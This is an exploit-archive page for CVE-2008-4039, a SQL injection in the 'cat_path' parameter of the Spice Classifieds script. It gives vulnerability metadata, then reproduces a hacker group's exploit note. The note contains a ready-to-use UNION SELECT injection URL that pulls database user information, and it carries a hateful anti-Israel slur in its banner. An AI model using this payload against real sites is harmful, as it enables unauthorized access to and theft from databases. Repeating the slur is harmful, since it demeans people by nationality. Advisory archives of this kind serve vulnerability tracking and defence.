Bug: Spice Classifieds (cat_path) Remote SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

Spice Classifieds (cat_path) Remote SQL Injection Vulnerability

Published
Credit
Risk
2008.09.13
Cyb3r-1sT
High
CWE
CVE
Local
Remote
CWE-89
CVE-2008-4039
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<<!>> Found by : Cyb3r-1sT

<<!>> C0ntact : cyb3r-1st [at] hotmail.com

<<!>> Groups : InjEctOr5 T3am


=======================================================
+++++++++++++ R3membeR Kings of injection ++++++++++++++
=======================================================


<<->> script : Spice Classifieds

<<->> script site : www.classifieds-scripts.com/spice



=======================================================
++++++++++++++++ pWning israel fuckers ++++++++++++++++
=======================================================


<<->> D0rk : find it

<<->> Exploit :>>>

>>>> www.site.me/patch/index.php?cat_path=-99999+union+select+0,user(),2,3/*





=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================


<<->> freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker
anaconda-ksa $ sirus $ crazy-x $ br1ght-dark $ colden-zero


<<->> InjEctOr5 TeaM freinds :: abo-najm $ Eng.Silent Night $ spid3r-net $ hacker-b0y $ qalbhamad $
Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal



<<->> All muslims

References:

http://www.securityfocus.com/bid/30985
http://www.milw0rm.com/exploits/6354
http://secunia.com/advisories/31664

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version